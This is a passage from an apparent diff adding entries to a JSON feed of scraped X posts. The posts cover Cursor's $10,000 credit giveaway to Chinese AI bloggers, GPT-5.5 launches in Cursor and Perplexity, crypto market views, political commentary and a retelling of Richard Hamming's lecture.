KEY,支持云端一键部署,太强了。\n\n我的提示词:\n我需要一个智能体实现:电商新品从0到上架 选品→找供应商→写详情页→生产品图→定价→广告文案,全套", + "url": "https://x.com/gkxspace/status/2048035527459319854", + "published_at": "2026-04-25T13:44:55+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "生财有术、得到新商学,哪个更好一些\n\n最近都在折扣阶段,生财2765、得到2888,还没进过这种大的社群,尝试一下\n\n你会选生财、得到、生财+得到都要,或者还有更好的推荐吗🤔", + "url": "https://x.com/gkxspace/status/2048032521942626343", + "published_at": "2026-04-25T13:32:58+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "R to @wolfyxbt: Image", + "url": "https://x.com/wolfyxbt/status/2048032308637442215", + "published_at": "2026-04-25T13:32:07+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "2019 年,孙哥放了巴菲特的鸽子;\n2026 年,嗯哼放了特朗普的鸽子。\n\n币圈真是个神奇的地方!", + "url": "https://x.com/wolfyxbt/status/2048031889789972748", + "published_at": "2026-04-25T13:30:27+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "RT by @Stv_Lynn: 最近校招面试了不少 985 实习生,一个很强烈的感受是:AI 工具正在把学生之间的资源差距快速放大。\n\n从我这段时间的感受看,差距真的可能到 5 倍。那些明显领先很多的同学,无一例外都比较早接触了 Claude Code、Codex 这类最好的 AI Coding 工具,也愿意自己花钱订阅。他们不只是会用工具,而是已经把它们变成了日常学习和开发的一部分。聊模型、工程、Agent、代码实践,可以很自然地聊一个小时,很多地方甚至比我理解得更深。\n\n但也有不少同学,学习成绩很好,计算机基础也扎实,只是因为家庭条件或预算有限,平时只能用国内中转站或更便宜的国产模型套餐,这个差距非常现实。现在最好的国产模型和国外一线模型,在 模型综合能力上大概还有半年左右的时间差。以前没有 AI 的时候,资源差距最多只是效率差一点,现在会直接影响视野、实践深度和自信心。\n\n这件事我最近一直在琢磨,对一些本来很有潜力的学生来说,只是因为每个月几十美元的门槛,就少接触了很多东西,我觉得挺可惜。想起我当时读大学的时候其实也经常阆中羞涩,好在大二认识了不少大牛学长带着我开始做商业项目养好了自己,挺感谢当时很耐心教我技术的各种朋友。\n\n所以我想做一个很小的尝试:拿一部分 X 发推收益,资助几位学习成绩不错、喜欢计算机、但家庭条件不太宽裕的同学,给他们提供几个月 Claude Code 或类似 AI Coding 工具的订阅,让他们真正体验一下目前比较好的模型和开发方式。\n\n不过我自己平时也比较忙,不太可能一个人长期处理申请、筛选、核验和跟进。所以也想顺便邀请一些对此有想法的朋友一起做。比如高校老师、学生负责人、开源社区成员,或者本身就在做教育、公益、开发者社区的朋友,可以一起帮忙想一个更靠谱的机制。\n\n这件事我暂时不想做大,也不想做成很复杂。先从小规模实验开始,比如每期 5 到 6 个同学,每人 3 到 4 个月,甚至也可以每周来找我视频问一些问题。想着优先看推荐、作品、学习记录和真实使用反馈,尽量避免变成单纯发钱或者拼谁会写申请,当然现在能上 X 的大学生应该不缺这个钱,所以还是需要看有没有更好的渠道。\n\n如果你有靠谱渠道,或者愿意一起参与规则设计、推荐、审核、跟进,欢迎私信我。能把这件事做得更可信一点,也许真的能帮到几个本来就很有潜力的同学。", + "url": "https://x.com/Stv_Lynn/status/2048011261473128477", + "published_at": "2026-04-25T12:08:29+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "虽然比特币回到 77,000 了,但是我还是非常悲观的\n\n我理想中的抄底价格是 35,000 的比特币\n\n感觉现在币圈虽然看起来一片欣欣向荣,但是更像是虚假繁荣,拉盘的全是一些强控筹的山寨币和小市值的 Meme,主流币除了 $BTC 和 $ETH 稍微涨了一点,其他大市值的山寨比如 $DOGE 和 $SOL 根本涨都涨不动。\n\n这种底我根本不敢抄呀,抄在半山腰至少得难受一年。\n\n感觉现在这种行情像是跌太久了跌不动了,狗庄掏点钱出来拉拉盘,榨干市场剩下的最后一点流动性,把平时比较保守但因为太久没操作的散户再钓出来收割一下。", + "url": "https://x.com/wolfyxbt/status/2047979690623955107", + "published_at": "2026-04-25T10:03:02+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "铁锤人看了一下额度有1w美金,瞬间眩晕瘫坐,如同第一次看到原子弹爆炸!", + "url": "https://x.com/lxfater/status/2047971888409051368", + "published_at": "2026-04-25T09:32:02+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 卧槽!Cursor 开始支持中文区 AI 博主了!\n这几天 Cursor 的团队成员 @edwinarbus 陆续私信了几位影响力较大的 Ai 博主,资助 1w 美金的免费额度, 算是头部 AI 产品首次对中文区做投放。但额度有时间限制,必须在 5 月 31 之前消耗掉。\n\n现在中文区只有极少部分的 KOL 拿到这个额度,所以含金量极高,统计到的只有 15 位博主,其中只有 3 位是币圈赛道的博主,分别是:\n• 杀破狼 @wolfyxbt\n• 0xAA:@0xAA_Science\n• 比特币橙子 @oragnes\n\n其他的都是纯 AI 赛道的博主,建议给他们都点个关注,毕竟算是 Cursor 认证的博主,他们的推特:\n@lxfater 、@Pluvio9yte 、 @frxiaobei 、@berryxia 、 @realNyarime 、 @dingyi 、 @CuiMao 、 @runes_leo 、 @bozhou_ai 、 @GoSailGlobal 、 @gkxspace 、 @Stv_Lynn\n\n此信息收集多数来自于 @GoSailGlobal 博主的推文", + "url": "https://x.com/bozhou_ai/status/2047968587902820543", + "published_at": "2026-04-25T09:18:55+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: GitHub outages since Microsoft acquisition 🤣", + "url": "https://x.com/paulg/status/2047957234664030380", + "published_at": "2026-04-25T08:33:48+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "我靠 Cursor 刚刚送了我 10,000 美金的额度!\n\n感谢 @cursor_ai @edwinarbus 的恩赐,这周马上回归使用 Cursor!", + "url": "https://x.com/wolfyxbt/status/2047948998250840240", + "published_at": "2026-04-25T08:01:04+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "现在全中推的人都在求Cursor的额度了😂", + "url": "https://x.com/lxfater/status/2047930707784487236", + "published_at": "2026-04-25T06:48:24+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "去了趟书店,被震惊了,到底谁在买这些书啊😅", + "url": "https://x.com/gkxspace/status/2047922526685155786", + "published_at": "2026-04-25T06:15:53+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "忘了说了其实我也有👉👈\n\n感谢 @cursor_ai ,这周尽快把 Stakka 给 ship 出来!", + "url": "https://x.com/Stv_Lynn/status/2047909458484040105", + "published_at": "2026-04-25T05:23:57+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "我过去 2 周的总曝光量是 1320 万,收益是 1799.75 美金。\n\n平均算下来,每 1 次曝光有 0.000136 美金的收益;\n\n每 1 万次曝光 1.36 美金的收益。", + "url": "https://x.com/wolfyxbt/status/2047908983101628720", + "published_at": "2026-04-25T05:22:04+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "嘿嘿,半夜睡不着占了点优势", + "url": "https://x.com/lxfater/status/2047892472177844641", + "published_at": "2026-04-25T04:16:28+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: Cursor官方认证博主✅ 你值得关注\n\n11位晒Cursor $10,000额度博主,按X发帖时间大致排序\n\n1️⃣ 铁锤人 (@lxfater)\n 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人\n \n推文链接:https://x.com/lxfater/status/2047738439823733097\n\n2️⃣ 雪踏乌云 (@Pluvio9yte)\n 简介:聚焦 AI & Vibe coding & Prompt & Agent,大厂创业产品(年固定收入7位数),分享AI编程&出海干货\n \n推文链接:https://x.com/Pluvio9yte/status/2047768818702069974\n\n3️⃣ 比特币橙子Trader (@oragnes)\n 简介:Bitcoin Holder | Crypto Investor & Research | AI | OpenClaw | VibeCoding\n \n推文链接:https://x.com/oragnes/status/2047843289571942533\n\n4️⃣ 凡人小北 (@frxiaobei)\n 简介:行道途中。在真实业务与组织中持续验证 AI 的价值与边界 | 个人IP|商业与管理|AI 咨询\n \n推文链接:https://x.com/frxiaobei/status/2047846324771713490\n\n5️⃣http://Berryxia.AI (@berryxia)\n 简介:Building AI tools | AI System Prompt | Love Design & Coding & Share Prompt\n \n推文链接:https://x.com/berryxia/status/2047845995220988355\n\n6️⃣奶昔 (@realNyarime)\n 简介:乃月希 aka Nyarime|Founder of Naixi Networks|Developer|Photographer\n \n推文链接:https://x.com/realNyarime/status/2047834820169146559\n\n7️⃣Ding (@dingyi)\n 简介:promote your product(产品推广专家)\n \n推文链接:https://x.com/dingyi/status/2047834056734437561\n\n8️⃣CuiMao (@CuiMao)\n 简介:AI Developer / NVIDIA YES / 深度学习 / 不接广告\n 推文链接:https://x.com/CuiMao/status/2047875131113111770\n\n9️⃣Leo (@runes_leo)\n 简介:预测市场策略 · AI 工具实战 · 独立构建日常 | Prediction markets × AI tools\n \n推文链接:https://x.com/runes_leo/status/2047874815399502287\n\n🔟泊舟 (@bozhou_ai)\n 简介:AI 程序员 & Vibe 编码者 | 构建 Agent、系统提示与高效流程 | AI中转站创业中\n \n推文链接:https://x.com/bozhou_ai/status/2047847486430286317\n\n🔟1️⃣Jason Zhu (@GoSailGlobal)\n 简介:独立开发,SaaS出海,AI价值内容分享 | GoSail Lab(MCN Founder,承接产品推广)\n\n 推文链接:https://x.com/GoSailGlobal/status/2047887839791345678", + "url": "https://x.com/bozhou_ai/status/2047891848908472433", + "published_at": "2026-04-25T04:13:59+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "RT by @gkxspace: Cursor官方认证博主✅ 你值得关注\n\n11位晒Cursor $10,000额度博主,按X发帖时间大致排序\n\n1️⃣ 铁锤人 (@lxfater)\n 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人\n \n推文链接:https://x.com/lxfater/status/2047738439823733097\n\n2️⃣ 雪踏乌云 (@Pluvio9yte)\n 简介:聚焦 AI & Vibe coding & Prompt & Agent,大厂创业产品(年固定收入7位数),分享AI编程&出海干货\n \n推文链接:https://x.com/Pluvio9yte/status/2047768818702069974\n\n3️⃣ 比特币橙子Trader (@oragnes)\n 简介:Bitcoin Holder | Crypto Investor & Research | AI | OpenClaw | VibeCoding\n \n推文链接:https://x.com/oragnes/status/2047843289571942533\n\n4️⃣ 凡人小北 (@frxiaobei)\n 简介:行道途中。在真实业务与组织中持续验证 AI 的价值与边界 | 个人IP|商业与管理|AI 咨询\n \n推文链接:https://x.com/frxiaobei/status/2047846324771713490\n\n5️⃣http://Berryxia.AI (@berryxia)\n 简介:Building AI tools | AI System Prompt | Love Design & Coding & Share Prompt\n \n推文链接:https://x.com/berryxia/status/2047845995220988355\n\n6️⃣奶昔 (@realNyarime)\n 简介:乃月希 aka Nyarime|Founder of Naixi Networks|Developer|Photographer\n \n推文链接:https://x.com/realNyarime/status/2047834820169146559\n\n7️⃣Ding (@dingyi)\n 简介:promote your product(产品推广专家)\n \n推文链接:https://x.com/dingyi/status/2047834056734437561\n\n8️⃣CuiMao (@CuiMao)\n 简介:AI Developer / NVIDIA YES / 深度学习 / 不接广告\n 推文链接:https://x.com/CuiMao/status/2047875131113111770\n\n9️⃣Leo (@runes_leo)\n 简介:预测市场策略 · AI 工具实战 · 独立构建日常 | Prediction markets × AI tools\n \n推文链接:https://x.com/runes_leo/status/2047874815399502287\n\n🔟泊舟 (@bozhou_ai)\n 简介:AI 程序员 & Vibe 编码者 | 构建 Agent、系统提示与高效流程 | AI中转站创业中\n \n推文链接:https://x.com/bozhou_ai/status/2047847486430286317\n\n🔟1️⃣Jason Zhu (@GoSailGlobal)\n 简介:独立开发,SaaS出海,AI价值内容分享 | GoSail Lab(MCN Founder,承接产品推广)\n\n 推文链接:https://x.com/GoSailGlobal/status/2047887839791345678", + "url": "https://x.com/gkxspace/status/2047891848908472433", + "published_at": "2026-04-25T04:13:59+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "卧槽,收到 Cursor 送的 10,000u AI 额度! \n\n昨天 @edwinarbus 联系我送额度的时候,我还以为是骗子。不过挂着 cursor 的标,而且只是要个邮箱,我抱着试一试的态度回复了,没想道还真送了!\n这个月要多 vibe coding 些狗屎了! @VibeShit_Org @cursor_ai", + "url": "https://x.com/0xAA_Science/status/2047889676867080420", + "published_at": "2026-04-25T04:05:21+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://x.com/DavidSacks/status/2047877294476116184", + "published_at": "2026-04-25T03:16:09+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "R to @wolfyxbt: 为了利于大家分析,这里发一下我自己的后台数据", + "url": "https://x.com/wolfyxbt/status/2047877064104284194", + "published_at": "2026-04-25T03:15:14+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://x.com/DavidSacks/status/2047871382923469241", + "published_at": "2026-04-25T02:52:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://x.com/DavidSacks/status/2047867592790946189", + "published_at": "2026-04-25T02:37:36+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "卧槽!牛逼牛逼!\n\n这两周的工资涨到了 1799 美金!\n\nThank you Elon Musk!", + "url": "https://x.com/wolfyxbt/status/2047865010182148284", + "published_at": "2026-04-25T02:27:20+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 \n\n2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。", + "url": "https://x.com/svwang1/status/2047858045057909226", + "published_at": "2026-04-25T01:59:39+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Cursor大善人,我也已经领到了,在X上获得的最大一笔收入", + "url": "https://x.com/bozhou_ai/status/2047847486430286317", + "published_at": "2026-04-25T01:17:42+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://x.com/DavidSacks/status/2047842000632713369", + "published_at": "2026-04-25T00:55:54+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this was a good week.\n\nproud of the team.\n\nhappy building!", + "url": "https://x.com/sama/status/2047823357635354814", + "published_at": "2026-04-24T23:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://x.com/DavidSacks/status/2047823154655932696", + "published_at": "2026-04-24T23:41:01+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: POD UP! Core four is back 🚨\n\nBig show:\n\n-- SpaceX-Cursor deal, using compute as leverage\n\n-- SaaS debt bomb coming to PE?, venture debt risk\n\n-- Software bloodbath, buy low potential?\n\n-- New Apple CEO: future of the company\n\n-- SPLC indictment, major allegations, out of control NGOs\n\n-- Science Corner returns! Colon cancer cause discovered?\n\n(0:00) Bestie intros!\n\n(4:55) SpaceX-Cursor deal, compute as leverage\n\n(18:33) SaaS bloodbath, debt bomb incoming, buy the dip?\n\n(46:20) New Apple CEO: John Ternus succeeds Tim Cook, what's next for Apple?\n\n(1:00:32) SPLC indictment, out of control NGOs\n\n(1:19:03) Science Corner: Potential cause discovered for colon cancer spike in young people", + "url": "https://x.com/DavidSacks/status/2047808256047821141", + "published_at": "2026-04-24T22:41:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This week I got to sit down with two truly generational CEOs and ask them anything: \n\n@tobi @Shopify ($160BN Market Cap)\n\nAdam Foroughi @AppLovin ($160BN Market Cap)\n\nI have the best job in the world.", + "url": "https://x.com/HarryStebbings/status/2047792195868967172", + "published_at": "2026-04-24T21:38:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being credits/token hungry). GPT 5.5 is more token-efficient in subagent orchestration.", + "url": "https://x.com/AravSrinivas/status/2047788775468908840", + "published_at": "2026-04-24T21:24:24+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 这是一个关于两个程序员开的Claude Code中转站的呕心沥血的故事,一张聊天记录诠释web2从业者开发的中转站有多负责\n\n今晚要进行数据库迁移,负载均衡配置,与sub2的版本对齐,还有很多为了用户体验上新的功能模块。\n于是我和泊舟 @bozhou_ai 商议凌晨2点到4点进行停机更新。\n\n泊舟明天周日要上班,陪我熬到了三点半。我今天早上要给猫打疫苗,约了早上8点的医院。在这种情况下,我们也一直撑着直到验收完所有的功能才撑着下线。\n\n时至今日,http://dragoncode.codes 几乎已经看不出是改自开源项目的痕迹了。大量的教学文档,余额预警、工单系统、代理商分销,都是我和泊舟一天一天敲出来的。\n\n说实话这个中转站开了一个月了,说实话,也没有当初设想的那么赚钱。与付出的时间相比,于我来说赚的并不多。\n我并不精通运维,出现过好几次故障,也熬过好几次通宵。好几次想跟泊舟说,我想放弃了。但因为有好几次令我心暖的事情,我坚持了下来。\n\n第一次是在工作日,redis缓存满了导致不可用,要迁移,售后群里的兄弟们没有出言压力,而是说相信我们,鼓励我们,我那个时候觉得这或许有些意义\n\n第二次是很多模块上新,我连着熬了好几天长夜,我主业工作白天强度也很高,每次早上都是打上车就立刻睡着的,好几次到地方都是司机把我叫醒。\n\n第三次我们招了个实习生,但是实习生开发的模块并不理想,因为不了解业务的原因,开发的功能有不符也有冗余,于是我跟泊舟说,还是我亲自来吧。\n\n第四次是跟泊舟得知有个人竟然一天卖20万rmb的token,泊舟憧憬说,🐴的,但凡我们有他一半就好了。我打趣说,舟子,你做梦呢。我是悲观主义,这么一看其实有个这样的朋友也挺好,还能打打鸡血。\n\n很多时候正在工作,泊舟甩过来一个B端用户的报错——这不得不立刻查,耽误了B端用户可能就觉得体验不好跑了。\n\n好几次接近不想干下去了,但是一想我跑路了泊舟一个人压力该有多大,同时也看到了群里的兄弟说“乌云早期的教程很有帮助” “我一个小白在这个群都能学到很多”,而且有时候潜水看群里看到群里也有跟我一样半夜熬到三点的兄弟,觉得很开心,最后才继续了下来。\n\n实际上,我们的站才刚刚运行一个月,但是我们一直在猛追进度,尽力把用户体验这块做到极致,所以所有的进度才会那么赶。\n\n一晚上,2小时,GPT Pro的额度打了百分之40,就为了快速修bug,在一开始说的维护结束时间凌晨4点之前准时恢复。\n做生意就是这样——信任建立很难,但是崩塌很容易,我们尽量维护好每一个承诺。", + "url": "https://x.com/bozhou_ai/status/2047776887116874076", + "published_at": "2026-04-24T20:37:10+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Download Cursor 3.2 to try these new features in the agents window: http://cursor.com/download", + "url": "https://x.com/cursor_ai/status/2047764656165646786", + "published_at": "2026-04-24T19:48:34+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: We've also added multi-root workspaces for cross-repo changes.\n\nA single agent session can now target a reusable workspace made of multiple folders.", + "url": "https://x.com/cursor_ai/status/2047764654760632725", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Another way to parallelize work is with new and improved worktrees in the agents window.\n\nRun isolated tasks in the background across different branches. When you're ready to test changes, move any branch into your local foreground with one click.", + "url": "https://x.com/cursor_ai/status/2047764652977958938", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Introducing /multitask in the new Cursor 3 interface.\n\nCursor can now run async subagents to parallelize your requests instead of adding them to the queue.\n\nFor already queued messages, you can ask Cursor to multitask on them instead of waiting for the current run to finish.", + "url": "https://x.com/cursor_ai/status/2047764651363180839", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know your feedback!", + "url": "https://x.com/AravSrinivas/status/2047753276888854595", + "published_at": "2026-04-24T19:03:21+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them.", + "url": "https://x.com/eladgil/status/2047748613976264835", + "published_at": "2026-04-24T18:44:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers.\n\nGPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.", + "url": "https://x.com/AravSrinivas/status/2047748486767272243", + "published_at": "2026-04-24T18:44:19+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: More on CursorBench: http://cursor.com/blog/cursorbench", + "url": "https://x.com/cursor_ai/status/2047744580280561948", + "published_at": "2026-04-24T18:28:47+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "GPT-5.5 is now available in Cursor!\n\nIt's currently the top model on CursorBench at 72.8%.\n\nWe've partnered with OpenAI to offer it for 50% off through May 2.", + "url": "https://x.com/cursor_ai/status/2047744579127185843", + "published_at": "2026-04-24T18:28:47+00:00", + "source": "nitter", + "title_zh": "GPT-5.5于Cursor平台发布,评测准确率达72.8%位居榜首,Cursor与OpenAI联合推出限时折扣优惠,截至5月2日。" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "R to @cursor_ai: 兄弟们1w美金 TOKEN呀\n\nhttps://x.com/lxfater/status/2047738439823733097?s=20", + "url": "https://x.com/lxfater/status/2047738989571154030", + "published_at": "2026-04-24T18:06:34+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.", + "url": "https://x.com/DavidSacks/status/2047717649849659586", + "published_at": "2026-04-24T16:41:47+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。\n\n投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。", + "url": "https://x.com/svwang1/status/2047703469063377001", + "published_at": "2026-04-24T15:45:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal:\nhttps://cnb.cx/4d3HAKp", + "url": "https://x.com/DavidSacks/status/2047703023690924289", + "published_at": "2026-04-24T15:43:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about are the quality of their products, and we don’t want the bias creeping into the products.\"", + "url": "https://x.com/DavidSacks/status/2047694657107165519", + "published_at": "2026-04-24T15:10:25+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their whole lives doing forgettable work.\n\nHis name was Richard Hamming. He won the Turing Award. He invented error-correcting codes that made modern computing possible. And he spent 30 years at Bell Labs sitting in a cafeteria at lunch watching which scientists became legendary and which ones faded into nothing.\n\nIn March 1986, he walked into a Bellcore auditorium in front of 200 researchers and told them exactly what he had seen.\n\nHere's the framework that has been quoted by every serious scientist for the last 40 years.\n\nHis opening line landed like a punch. He said most scientists he worked with at Bell Labs were just as smart as the Nobel Prize winners. Just as hardworking. Just as credentialed. And yet at the end of a 40-year career, one group had changed entire fields and the other group was forgotten by the time they retired.\n\nHe wanted to know what the difference actually was. And he said it wasn't luck. It wasn't IQ. It was a specific set of habits that almost nobody is willing to follow.\n\nThe first habit was the one that hurts the most to hear. He said most scientists deliberately avoid the most important problem in their field because the odds of failure are too high. They pick a safe adjacent problem, solve it cleanly, publish it, and move on. And because they never swing at the hard problem, they never hit it. He said if you do not work on an important problem, it is unlikely you will do important work. That is not a motivational line. That is a logical one.\n\nThe second habit was about doors. Literal doors. He noticed that the scientists at Bell Labs who kept their office doors closed got more done in the short term because they had no interruptions. But the scientists who kept their doors open got more done over a career. The open-door scientists were interrupted constantly. They also absorbed every new idea passing through the hallway. Ten years in, they were working on problems the closed-door scientists did not even know existed.\n\nThe third habit was inversion. When Bell Labs refused to give him the team of programmers he wanted, Hamming sat with the rejection for weeks. Then he flipped the question. Instead of asking for programmers to write the programs, he asked why machines could not write the programs themselves. That single inversion pushed him into the frontier of computer science. He said the pattern repeats everywhere. What looks like a defect, if you flip it correctly, becomes the exact thing that pushes you ahead of everyone else.\n\nThe fourth habit was the one that hit me the hardest. He said knowledge and productivity compound like interest. Someone who works 10 percent harder than you does not produce 10 percent more over a career. They produce twice as much. The gap doesn't add. It multiplies. And it compounds silently for years before anyone notices.\n\nHe finished the lecture with a line I have never been able to shake.\n\nHe said Pasteur's famous quote is right. Luck favors the prepared mind. But he meant it literally. You don't hope for luck. You engineer the conditions where luck can land on you. Open doors. Important problems. Inverted questions. Compounded hours. Those are not traits. Those are choices you make every single day.\n\nThe transcript has been sitting on the University of Virginia's computer science website for almost 30 years. The video is free on YouTube. Stripe Press reprinted the full lectures as a book in 2020 and Bret Victor wrote the foreword.\n\nHamming died in 1998. He gave his final lecture a few weeks before. He was 82.\n\nThe lecture that explains why some careers become legendary and others disappear is still free. Most people who could benefit from it will never open it.", + "url": "https://x.com/ylecun/status/2047680485208531152", + "published_at": "2026-04-24T14:14:06+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. \n\nAlso some other eyebrow-raising sections in this interview.", + "url": "https://x.com/ylecun/status/2047676640059154653", + "published_at": "2026-04-24T13:58:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share", + "url": 